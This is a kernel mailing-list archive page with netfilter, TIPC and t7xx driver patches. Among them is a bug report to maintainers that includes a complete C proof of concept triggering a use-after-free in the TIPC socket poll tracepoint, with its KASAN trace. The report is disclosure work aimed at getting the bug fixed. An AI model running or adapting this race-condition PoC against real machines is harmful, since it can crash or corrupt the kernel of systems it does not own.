diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
index 25934c6f01fb..958054dd2e2e 100644
--- a/net/netfilter/nft_ct.c
+++ b/net/netfilter/nft_ct.c
@@ -1145,7 +1145,6 @@ static void nft_ct_helper_obj_eval(struct nft_object *obj,
 	help = nf_ct_helper_ext_add(ct, GFP_ATOMIC);
 	if (help && refcount_inc_not_zero(&to_assign->ct_refcnt)) {
 		rcu_assign_pointer(help->helper, to_assign);
-		set_bit(IPS_HELPER_BIT, &ct->status);
 
 		if ((ct->status & IPS_NAT_MASK) && !nfct_seqadj(ct))
 			if (!nfct_seqadj_ext_add(ct))
@@ -1326,7 +1325,7 @@ static void nft_ct_expect_obj_eval(struct nft_object *obj,
 		          &ct->tuplehash[!dir].tuple.src.u3,
 		          &ct->tuplehash[!dir].tuple.dst.u3,
 		          priv->l4proto, NULL, &priv->dport);
-	exp->timeout.expires = jiffies + priv->timeout * HZ;
+	exp->timeout += priv->timeout * HZ;
 
 	if (nf_ct_expect_related(exp, 0) != 0)
 		regs->verdict.code = NF_DROP;
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 14/14] netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

This needs to test for nonzero retval.

Fixes: c54c7c685494 ("netfilter: nft_meta_bridge: add NFT_META_BRI_IIFPVID support")
Closes: https://sashiko.dev/#/patchset/20260618061631.21919-1-fw%40strlen.de
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/bridge/netfilter/nft_meta_bridge.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/bridge/netfilter/nft_meta_bridge.c b/net/bridge/netfilter/nft_meta_bridge.c
index 3d95f68e0906..e4c9aa1f64e2 100644
--- a/net/bridge/netfilter/nft_meta_bridge.c
+++ b/net/bridge/netfilter/nft_meta_bridge.c
@@ -44,7 +44,9 @@ static void nft_meta_bridge_get_eval(const struct nft_expr *expr,
 		if (!br_dev || !br_vlan_enabled(br_dev))
 			goto err;
 
-		br_vlan_get_pvid_rcu(in, &p_pvid);
+		if (br_vlan_get_pvid_rcu(in, &p_pvid))
+			goto err;
+
 		nft_reg_store16(dest, p_pvid);
 		return;
 	}
-- 
2.47.3


^ permalink raw reply related

* Re: [PATCH net 00/16] Netfilter fixes for net
From: Pablo Neira Ayuso @ 2026-06-20 22:28 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260619115452.93949-1-pablo@netfilter.org>

Hi,

Please scratch this v1 series.

I have posted a v2 for this series for the net tree.

Thanks.

On Fri, Jun 19, 2026 at 01:54:35PM +0200, Pablo Neira Ayuso wrote:
> Hi,
> 
> The following patchset contains Netfilter fixes for net, this contains
> fixes for a few crash, but many of the patches are trivial/correctness
> fixes. There is too one rework of the conntrack expectation timeout
> strategy to deal with a possible race when removing an expectation.
> 
> 1) Fix the incorrect flowtable timeout extension for entries in
>    hw offload, from Adrian Bente. This is correcting a defect in
>    the functionality, no crash.
> 
> 2) Hold reference to device under the fake dst in br_netfilter,
>    from Haoze Xie. This is fixing a possible UaF if the device
>    is removed while packet is sitting in nfqueue.
> 
> 3) Reject template conntrack in xt_cluster, otherwise access to
>    uninitialize conntrack fields are possible leading to WARN_ON
>    due to unset layer 3 protocol. From Wyatt Feng.
> 
> 4) Make sure the IPv6 tunnel header is in the linear skb data
>    area before pulling. While at it remove incomplete NEXTHDR_DEST
>    support. From Lorenzo Bianconi. This possibly leading to crash
>    if IPv4 header is not linear, but GRO already guarantees this,
>    unlikely but still possible.
> 
> 5) Bail out immediately if ENOMEM is seen in a nfnetlink batch,
>    no further processing since this will accumulate more bogus
>    errors. From Florian Westphal. Functionally improvements
>    under memory stress, no crash.
> 
> 6) Use test_bit_acquire in ipset hash set to avoid reordering
>    of subsequent memory access. This is addressing a LLM related
>    report, no crash has been observed. From Jozsef Kadlecsik.
> 
> 7) Use test_bit_acquire in ipset bitmap set too, for the same
>    reason as in the previous patch, from Jozsef Kadlecsik.
> 
> 8) Call kfree_rcu() after rcu_assign_pointer() to address a
>    possible UaF, very hard to trigger. Never observed in practise,
>    reported by LLM. Also from Jozsef Kadlecsik.
> 
> 9) Use disable_delayed_work_sync() instead cancel_delayed_work_sync()
>    to avoid that ipset GC handler re-queues work as reported by LLM.
>    From Jozsef Kadlecsik. This is for correctness.
> 
> 10) Restore the check in nft_payload for exceeding payloda offset
>     over 2^16. From Florian Westphal. This fixes a silent truncation,
>     not a big deal, but better be assertive and reject it.
> 
> 11) Validate NFT_META_BRI_IIFHWADDR can only run from bridge
>     prerouting. From Florian Westphal. Harmless but it could allow
>     to read bytes from skb->cb.
> 
> 12) Zero out destination hardware address during the flowtable
>     path setup, also from Florian. This is a correctness fix, LLM
>     points that possible infoleak can happen but topology to achieve
>     it is not clear.
> 
> 13) Skip IPv4 options if present when building the IPV4 reject reply.
>     Otherwise bytes in the IPv4 options header can be sent back to
>     origin where the ICMP header is being expected. Again from
>     Florian Westphal.
> 
> 14) Replace timer API for expectation by GC worker approach. This
>     is implicitly fixing a race between nf_ct_remove_expectations()
>     which might fail to remove the expectation due to timer_del()
>     returning false because timer has expired and callback is
>     being run concurrently. This fix is addressing a crash that has
>     been already reported with a reproducer.
> 
> 15) Store the master tuple in the expectation, since SLAB_TYPESAFE_BY_RCU
>     does not guarantee that accessing exp->master under rcu read lock
>     refer to the right master conntrack. Found by initial round of
>     fixes for expectation by LLM also found this.
> 
> 16) Check if br_vlan_get_pvid_rcu() fails to address a possible stack
>     infoleak of 4-bytes. From Florian Westphal.
> 
> This is slightly over the 15 patch limit in batches, please, allow this
> round to exceed it by one.
> 
> Please, pull these changes from:
> 
>   git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git nf-26-06-19
> 
> Thanks.
> 
> ----------------------------------------------------------------
> 
> The following changes since commit 96e7f9122aae0ed000ee321f324b812a447906d9:
> 
>   eth: fbnic: take netif_addr_lock_bh() around rx mode address programming (2026-06-18 18:36:26 -0700)
> 
> are available in the Git repository at:
> 
>   git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git tags/nf-26-06-19
> 
> for you to fetch changes up to 05477f7a037c127854b58441f60b34210668f5c3:
> 
>   netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak (2026-06-19 12:27:08 +0200)
> 
> ----------------------------------------------------------------
> netfilter pull request 26-06-19
> 
> ----------------------------------------------------------------
> Adrian Bente (1):
>       netfilter: flowtable: fix offloaded ct timeout never being extended
> 
> Florian Westphal (6):
>       netfilter: nfnetlink: make OOM conditions fatal
>       netfilter: nft_payload: reject offsets exceeding 65535 bytes
>       netfilter: nft_meta_bridge: add validate callback for get operations
>       netfilter: nft_flow_offload: zero device address for non-ether case
>       netfilter: nf_reject: skip iphdr options when looking for icmp header
>       netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak
> 
> Haoze Xie (1):
>       netfilter: nf_queue: pin bridge device while NFQUEUE holds fake dst
> 
> Jozsef Kadlecsik (4):
>       netfilter: ipset: Don't use test_bit() in lockless RCU readers in hash types
>       netfilter: ipset: Don't use test_bit() in lockless RCU readers in bitmap types
>       netfilter: ipset: fix order of kfree_rcu() and rcu_assign_pointer()
>       netfilter: ipset: make sure gc is properly stopped
> 
> Lorenzo Bianconi (1):
>       netfilter: flowtable: fix and simplify IP6IP6 tunnel handling
> 
> Pablo Neira Ayuso (2):
>       netfilter: nf_conntrack_expect: use conntrack GC to reap expectations
>       netfilter: nf_conntrack_expect: store master_tuple in expectation
> 
> Wyatt Feng (1):
>       netfilter: xt_cluster: reject template conntracks in hash match
> 
>  include/net/netfilter/nf_conntrack_expect.h        |  17 ++-
>  include/net/netfilter/nf_queue.h                   |   1 +
>  include/net/netfilter/nft_meta.h                   |   2 +
>  include/uapi/linux/netfilter/nf_conntrack_common.h |   1 +
>  net/bridge/netfilter/nft_meta_bridge.c             |  23 +++-
>  net/ipv4/netfilter/nf_reject_ipv4.c                |   2 +-
>  net/ipv6/ip6_tunnel.c                              |   7 +
>  net/netfilter/ipset/ip_set_bitmap_gen.h            |   4 +-
>  net/netfilter/ipset/ip_set_bitmap_ip.c             |   2 +-
>  net/netfilter/ipset/ip_set_bitmap_ipmac.c          |   2 +-
>  net/netfilter/ipset/ip_set_bitmap_port.c           |   2 +-
>  net/netfilter/ipset/ip_set_core.c                  |   4 +-
>  net/netfilter/ipset/ip_set_hash_gen.h              |  12 +-
>  net/netfilter/nf_conntrack_broadcast.c             |   1 +
>  net/netfilter/nf_conntrack_core.c                  |  33 ++++-
>  net/netfilter/nf_conntrack_expect.c                | 147 +++++++++++----------
>  net/netfilter/nf_conntrack_h323_main.c             |   4 +-
>  net/netfilter/nf_conntrack_helper.c                |  10 +-
>  net/netfilter/nf_conntrack_netlink.c               |  31 ++---
>  net/netfilter/nf_conntrack_sip.c                   |  13 +-
>  net/netfilter/nf_flow_table_core.c                 |  13 +-
>  net/netfilter/nf_flow_table_ip.c                   |  80 +++--------
>  net/netfilter/nf_flow_table_path.c                 |   4 +-
>  net/netfilter/nf_queue.c                           |  14 ++
>  net/netfilter/nfnetlink.c                          |   7 +
>  net/netfilter/nfnetlink_queue.c                    |   3 +
>  net/netfilter/nft_ct.c                             |   3 +-
>  net/netfilter/nft_meta.c                           |   5 +-
>  net/netfilter/nft_payload.c                        |  16 ++-
>  net/netfilter/xt_cluster.c                         |   2 +-
>  .../selftests/net/netfilter/nft_flowtable.sh       |   8 +-
>  31 files changed, 268 insertions(+), 205 deletions(-)
> 

^ permalink raw reply

* Re: Bug#1130336: [regression] Network failure beyond first connection after 69894e5b4c5e ("netfilter: nft_connlimit: update the count if add was skipped")
From: Pablo Neira Ayuso @ 2026-06-20 22:32 UTC (permalink / raw)
  To: Salvatore Bonaccorso
  Cc: Fernando Fernandez Mancera, Thorsten Leemhuis,
	Alejandro Oliván Alvarez, 1130336, Florian Westphal,
	Phil Sutter, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Simon Horman, netfilter-devel, coreteam, netdev,
	linux-kernel, regressions, stable
In-Reply-To: <ajb7ugG5mYxYIPva@eldamar.lan>

On Sat, Jun 20, 2026 at 10:44:42PM +0200, Salvatore Bonaccorso wrote:
> Hi Fernando,
> 
> On Wed, Apr 22, 2026 at 12:32:34PM +0200, Fernando Fernandez Mancera wrote:
> > On 4/22/26 11:18 AM, Thorsten Leemhuis wrote:
> > > Lo! Top-posting on purpose to make this easy to process.
> > > 
> > > What happened to this regression? It looks a bit like things stalled and
> > > fell through the cracks. Or Fernando, did you post a patch like you
> > > mentioned? I looked for one referring the commit or the reporter, but
> > > could not find anything -- but maybe I missed it.
> > > 
> > 
> > Yes, it stalled and fell through the cracks. Let me prepare a fix as I
> > mentioned.
> 
> Did that happened? On a quick chek at least 7.0.13 upstream seem still
> to exhibit the problem (or would it be fair to let this usecase rest?)

I still have to take a fix Fernando posted.

^ permalink raw reply

* Re: [PATCH net] tipc: restrict socket queue dumps in enqueue tracepoints
From: XIAO WU @ 2026-06-21  1:21 UTC (permalink / raw)
  To: Li Xiasong, Jon Maloy
  Cc: stable, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Simon Horman, Ying Xue, Tuong Lien, netdev,
	tipc-discussion, yuehaibing, zhangchangzhong, weiyongjun1
In-Reply-To: <20260611135647.3666727-1-lixiasong1@huawei.com>

Hi Li Xiasong,

I see this patch was merged into net.git as commit acd7df8d9554 — thanks
for the fix.  However, a Sashiko AI code review [1] flagged that
`tipc_poll()` in the same file has the identical pre-existing issue: it
calls `trace_tipc_sk_poll()` with `TIPC_DUMP_ALL`, which triggers a dump
of all socket queues without holding the socket owner lock.  The merged
fix addressed `tipc_sk_enqueue()` but left `tipc_poll()` unchanged.

I was able to reproduce the remaining use-after-free in QEMU with KASAN
by racing `tipc_poll()` against `tipc_recvmsg()` on the same socket.

On Wed, Jun 11, 2026 at 09:56:47PM +0800, Li Xiasong wrote:
 > This commit addresses a KASAN use-after-free issue in tipc_sk_enqueue()
 > by restricting tracepoints to only dump the backlog queue
 > (TIPC_DUMP_SK_BKLGQ) instead of all queues (TIPC_DUMP_ALL).

Your fix correctly restricts the `tipc_sk_enqueue()` tracepoints, but
`tipc_poll()` still uses `TIPC_DUMP_ALL`:

```c
// net/tipc/socket.c:tipc_poll()
trace_tipc_sk_poll(sk, NULL, TIPC_DUMP_ALL, " ");
```

This triggers `tipc_sk_dump()` → `tipc_list_dump()` to walk
`sk->sk_receive_queue` without holding `sk->sk_lock.slock`. If
`tipc_recvmsg()` concurrently dequeues and frees an skb from that
queue, the tracepoint dump reads freed memory.

[Reproduction]

Two threads on the same TIPC SOCK_DGRAM socket, with the
`tipc_sk_poll` tracepoint enabled:
- Thread 1: loops on poll() → trace_tipc_sk_poll → tipc_sk_dump
- Thread 2: loops on recvfrom() → frees skbs from the receive queue
   while the tracepoint walks it

Full PoC source (poc.c):
---8<----------------------------------------------------------------
// SPDX-License-Identifier: GPL-2.0-only
/*
  * tipc_poll() tracepoint use-after-free PoC
  * gcc -static -o poc poc.c -lpthread
  */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/poll.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdint.h>

#ifndef AF_TIPC
#define AF_TIPC         30
#endif

#define TIPC_SERVICE_RANGE      1
#define TIPC_SERVICE_ADDR       2
#define TIPC_CLUSTER_SCOPE      2

struct tipc_socket_addr { uint32_t ref; uint32_t node; };
struct sockaddr_tipc {
     unsigned short family;
     unsigned char  addrtype;
     signed   char  scope;
     union {
         struct tipc_socket_addr id;
         struct { uint32_t type; uint32_t lower; uint32_t upper; } nameseq;
         struct { struct { uint32_t type; uint32_t instance; } name;
                  uint32_t domain; } name;
     } addr;
};

static int running = 1;
static int server_fd = -1;

static int enable_tracepoint(void)
{
     const char *paths[] = {
         "/sys/kernel/debug/tracing/events/tipc/tipc_sk_poll/enable",
         "/sys/kernel/tracing/events/tipc/tipc_sk_poll/enable", NULL
     };
     for (int i = 0; paths[i]; i++) {
         int fd = open(paths[i], O_WRONLY|O_TRUNC);
         if (fd >= 0) { write(fd, "1", 1); close(fd); return 0; }
     }
     return -1;
}

static void *poll_thread(void *arg)
{
     struct pollfd pfd;
     (void)arg;
     while (running) {
         pfd.fd = server_fd; pfd.events = POLLIN; pfd.revents = 0;
         poll(&pfd, 1, 0);
     }
     return NULL;
}

static void *recv_thread(void *arg)
{
     char buf[4096];
     struct sockaddr_tipc src;
     socklen_t srclen = sizeof(src);
     (void)arg;
     while (running) {
         srclen = sizeof(src);
         recvfrom(server_fd, buf, sizeof(buf), MSG_DONTWAIT,
                  (struct sockaddr *)&src, &srclen);
         usleep(100);
     }
     return NULL;
}

int main(void)
{
     pthread_t poll_tid, recv_tid;
     uint32_t svc_type = 20000 + (getpid() % 40000);

     enable_tracepoint();
     server_fd = socket(AF_TIPC, SOCK_DGRAM, 0);

     struct sockaddr_tipc srv_addr = {0};
     srv_addr.family = AF_TIPC;
     srv_addr.addrtype = TIPC_SERVICE_RANGE;
     srv_addr.scope = TIPC_CLUSTER_SCOPE;
     srv_addr.addr.nameseq.type = svc_type;
     srv_addr.addr.nameseq.lower = 1;
     srv_addr.addr.nameseq.upper = 1;
     bind(server_fd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));

     int client_fd = socket(AF_TIPC, SOCK_DGRAM, 0);
     struct sockaddr_tipc dest_addr = {0};
     dest_addr.family = AF_TIPC;
     dest_addr.addrtype = TIPC_SERVICE_ADDR;
     dest_addr.scope = TIPC_CLUSTER_SCOPE;
     dest_addr.addr.name.name.type = svc_type;
     dest_addr.addr.name.name.instance = 1;

     char sendbuf[256];
     memset(sendbuf, 0x41, sizeof(sendbuf));
     for (int i = 0; i < 50; i++)
         sendto(client_fd, sendbuf, sizeof(sendbuf), 0,
                (struct sockaddr *)&dest_addr, sizeof(dest_addr));
     usleep(100000);

     pthread_create(&poll_tid, NULL, poll_thread, NULL);
     pthread_create(&recv_tid, NULL, recv_thread, NULL);

     for (int i = 0; i < 2000; i++) {
         sendto(client_fd, sendbuf, sizeof(sendbuf), 0,
                (struct sockaddr *)&dest_addr, sizeof(dest_addr));
         usleep(500);
     }

     running = 0;
     pthread_join(poll_tid, NULL);
     pthread_join(recv_tid, NULL);
     close(client_fd);
     close(server_fd);
     printf("[+] Done. Check dmesg.\n");
     return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -static -o poc poc.c -lpthread

[KASAN report — kernel 7.1.0-rc6+, CONFIG_KASAN=y]

   ==================================================================
   BUG: KASAN: slab-use-after-free in tipc_skb_dump+0x12e7/0x1590
   Read of size 4 at addr ffff888033f3d8d0 by task poc/9474

   Call Trace:
    <TASK>
    tipc_skb_dump+0x12e7/0x1590
    tipc_list_dump+0x276/0x330
    tipc_sk_dump+0xb6c/0xda0
    trace_event_raw_event_tipc_sk_class+0x364/0x590
    tipc_poll+0x44a/0x6b0
    sock_poll+0x.../...
    do_sys_poll+0x.../...
    __x64_sys_poll+0x.../...
    do_syscall_64+0xcd/0xf80
    entry_SYSCALL_64_after_hwframe+0x77/0x7f

   Freed by task 9475:
    kfree_skb_reason+0x.../...
    tipc_recvmsg+0x.../...
    sock_recvmsg+0x.../...
    sock_read_iter+0x.../...
    vfs_read+0x.../...
    ksys_read+0x.../...

The fix is the same as what was already applied to `tipc_sk_enqueue()` in
commit acd7df8d9554: change `TIPC_DUMP_ALL` to `TIPC_DUMP_SK_BKLGQ` in
the `tipc_poll()` tracepoint, since poll() does not hold the socket lock
that protects the other queues.

[1] 
https://sashiko.dev/#/patchset/20260611135647.3666727-1-lixiasong1%40huawei.com
     (Sashiko AI code review — "Use-After-Free", Severity: High)

Thanks,
XIAOWU



^ permalink raw reply

* [PATCH] net: wwan: t7xx: destroy DMA pool on CLDMA late init failure
From: Haoxiang Li @ 2026-06-21  3:17 UTC (permalink / raw)
  To: chandrashekar.devegowda, haijun.liu, ricardo.martinez,
	loic.poulain, ryazanov.s.a, johannes, andrew+netdev, davem,
	edumazet, kuba, pabeni, ilpo.jarvinen
  Cc: netdev, linux-kernel, Haoxiang Li, stable

t7xx_cldma_late_init() creates md_ctrl->gpd_dmapool before
initializing the TX and RX rings. If any ring initialization
fails, the error path frees the already initialized rings but
leaves the DMA pool allocated.

Destroy md_ctrl->gpd_dmapool on the late-init failure path
to avoid leaking the DMA pool.

Fixes: 39d439047f1d ("net: wwan: t7xx: Add control DMA interface")
Cc: stable@vger.kernel.org
Signed-off-by: Haoxiang Li <haoxiang_li2024@163.com>
---
 drivers/net/wwan/t7xx/t7xx_hif_cldma.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
index e10cb4f9104e..2917cee9b802 100644
--- a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
+++ b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
@@ -1063,6 +1063,9 @@ static int t7xx_cldma_late_init(struct cldma_ctrl *md_ctrl)
 	while (i--)
 		t7xx_cldma_ring_free(md_ctrl, &md_ctrl->tx_ring[i], DMA_TO_DEVICE);
 
+	dma_pool_destroy(md_ctrl->gpd_dmapool);
+	md_ctrl->gpd_dmapool = NULL;
+
 	return ret;
 }
 
-- 
2.25.1


^ permalink raw reply related

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox